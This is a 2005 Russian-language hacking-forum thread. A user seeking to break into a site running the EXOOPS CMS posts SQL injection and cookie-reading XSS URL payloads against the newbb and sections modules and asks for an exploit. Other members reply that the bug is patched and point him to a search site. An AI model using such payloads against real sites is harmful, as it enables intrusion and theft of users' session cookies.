EXOOPS

Discussion in 'Уязвимости' started by TNT, 24 Aug 2005.

  1. TNT

    TNT New Member

    Joined:
    20 Aug 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Я извеняюсь может я залез не в тему, но это единственный раздел который мне кажется ближе к теме. Есть такой движок сайта как EXOOPS. но я не могу н-ти в нем дырку. Все, что я нашел так это только:
    http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
    http://[target]/modules/sections/index.php?op=viewarticle&artid=9,+9,+9

    Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Пример:
    http://[target]/modules/newbb/viewforum.php?
    sortname=p.post_time&sortorder=ASC&
    sortdays=%22%3E%3Cscript%3E
    alert(document.cookie)%3C/script %
    3E&forum=25&refresh=Vai

    http://[target]/modules/newbb/index.php?
    viewcat=%22%3E%3Cscript%3E
    alert(document.cookie)%3C/script%3E

    Но запросы он игнорирует. Кстати я слышал, что есть эксплойт для данного движка, но я не смог его найти. Не подскажите где его можно взять.
     
  2. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    А че в тему о форумах пишешь? Вообще тут про форумы а не про движки Exoops говорят...
     
  3. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Если игорирует, то экслойт тебя не спасет... Бага прикрыта. А так - securitylab.ru \ поиск
    [​IMG]
     
  4. TNT

    TNT New Member

    Joined:
    20 Aug 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Но бага должна быть, полюбому. Нет сайта который нельзя сломать.